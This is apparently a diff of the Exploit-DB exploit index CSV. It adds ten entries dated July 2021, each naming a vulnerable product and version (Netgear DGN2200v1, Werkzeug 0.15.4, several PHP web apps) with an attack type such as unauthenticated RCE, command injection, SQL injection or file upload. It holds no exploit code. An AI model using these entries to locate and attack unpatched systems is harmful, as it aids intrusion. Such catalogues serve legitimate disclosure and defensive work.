 50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,
 50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",2021-06-28,"Toby Jackson",webapps,php,
@ -44235,3 +44235,13 @@ id,file,description,date,author,type,platform,port
 50094,exploits/php/webapps/50094.py,"Simple Client Management System 1.0 - Remote Code Execution (RCE)",2021-07-05,"Ishan Saha",webapps,php,
 50095,exploits/php/webapps/50095.py,"TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated)",2021-07-05,"Mevlüt Akçam",webapps,php,
 50096,exploits/hardware/webapps/50096.py,"Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE)",2021-07-05,LiquidWorm,webapps,hardware,
+50097,exploits/multiple/webapps/50097.txt,"perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)",2021-07-06,"Alhasan Abbas",webapps,multiple,
+50098,exploits/multiple/webapps/50098.txt,"Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)",2021-07-06,"Andrea D\'Ubaldo",webapps,multiple,
+50099,exploits/hardware/webapps/50099.py,"Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated)",2021-07-06,SivertPL,webapps,hardware,
+50100,exploits/hardware/webapps/50100.py,"Black Box Kvm Extender 3.4.31307 - Local File Inclusion",2021-07-06,"Ferhat Çil",webapps,hardware,
+50101,exploits/python/webapps/50101.py,"Pallets Werkzeug 0.15.4 - Path Traversal",2021-07-06,faisalfs10x,webapps,python,
+50102,exploits/php/webapps/50102.py,"Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-07-06,"Talha DEMİRSOY",webapps,php,
+50103,exploits/php/webapps/50103.php,"Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated)",2021-07-06,"Thamer Almohammadi",webapps,php,
+50104,exploits/hardware/webapps/50104.txt,"Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation",2021-07-06,"Andrea D\'Ubaldo",webapps,hardware,
+50105,exploits/php/webapps/50105.txt,"Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi)",2021-07-06,faisalfs10x,webapps,php,
+50106,exploits/php/webapps/50106.txt,"Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution",2021-07-06,faisalfs10x,webapps,php,